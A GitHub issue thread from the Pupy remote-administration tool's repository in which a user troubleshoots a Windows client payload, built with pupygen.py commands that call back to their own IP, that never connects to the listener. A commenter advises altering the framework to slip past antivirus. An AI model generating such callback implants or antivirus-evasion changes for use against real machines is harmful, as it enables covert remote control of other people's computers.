### ISSUE TITLE
Windows payload not working 

### ISSUE THREAD

**Issue by kaush-rasto** [n1nj4sec/pupy#497]
Hello , 

I installed Pupy following  : https://github.com/n1nj4sec/pupy/wiki/Installation

I generated the payload as follows  : 

User@ubuntu:~/Downloads/pupy/pupy$ python pupygen.py -f client -O windows -A x86 auto_proxy MyIP:443
WARNING:root:Your templates are not synced with your pupy version ! , you should update them with "git submodule update"
WARNING:root:Your templates are not synced with your pupy version ! , you should update them with "git submodule update"
[+] Generate client: windows/x86
[C] launcher: auto_proxy
[C] launcher_args: ['--host', 'MyIP:443', '-t', 'ssl']
[C] debug: False
[I] Credentials password: 
[+] Required credentials:
[+] SSL_BIND_CERT, SSL_CA_CERT, SSL_CLIENT_CERT, SSL_BIND_KEY, SSL_CLIENT_KEY
[+] OUTPUT_PATH = /home/user/Downloads/pupy/pupy/pupyx86.AtypGp.exe
[+] SCRIPTLETS = []
[+] DEBUG = False 

And an exe is generated  . 

I ran that exe on a windows machine and started server on my linux VM.

sudo python pupysh.py --port 443

but it says no clients alive . 

Did I do something wrong ?

**Comment by kaush-rasto** [comment]
I am generating the payload form ubuntu running in VM . 

Is that a problem ?

**Comment by n1nj4sec** [comment]
No, you probably have a network issue. try connect instead of auto_proxy

**Comment by kaush-rasto** [comment]
ok I tried to generate exe using connect 

user@ubuntu:~/Downloads/pupy/pupy$ ./pupygen.py connect --host <myip>:9456
WARNING:root:Your templates are not synced with your pupy version ! , you should update them with "git submodule update"
WARNING:root:Your templates are not synced with your pupy version ! , you should update them with "git submodule update"
[+] Generate client: windows/x86
[C] launcher: connect
[C] launcher_args: ['--host', '<myip>:9456']
[C] debug: False
[I] Credentials password: 
[+] Required credentials:
[+] SSL_BIND_CERT, SSL_CA_CERT, SSL_CLIENT_CERT, SSL_BIND_KEY, SSL_CLIENT_KEY
[+] OUTPUT_PATH = /home/user/Downloads/pupy/pupy/pupyx86.fqZmx5.exe
[+] SCRIPTLETS = []
[+] DEBUG = False

Exe created . 

I ran exe on windows 7 PC . 

And ./pupysh.py -port 9456 
on my Ubuntu VM .

Still no clients active .

**Comment by s1st3r** [comment]
maybe your exe is being caught by Antivirus, try change a few things in the framework, you might bypass somewhere. Otherwise disable AV.

**Comment by kaush-rasto** [comment]
not really .. same thing when I disable AV . 

moreover I dont see any pings going out from the exe client to pupy server ..

**Comment by sl4v** [comment]
I have the same issue when running client binary from console. Running it from GUI (double click in explorer) works fine.

**Comment by Mr-BlackHat** [comment]
@n1nj4sec hey bro I’m doing a project and i need help for that can u pls tell me how u created that windows payload u Mentioned Something that “it is a pre-compiled and  converted using Pyinstaller”.
Pls help help.
![fb112533-1cbd-4d62-bde0-d40a5005770d](https://user-images.githubusercontent.com/35703496/38467285-f5eda2ec-3b53-11e8-80b1-e283058fdecb.jpeg)

**Comment by quentinhardy** [comment]
I think this issue can be closed now.
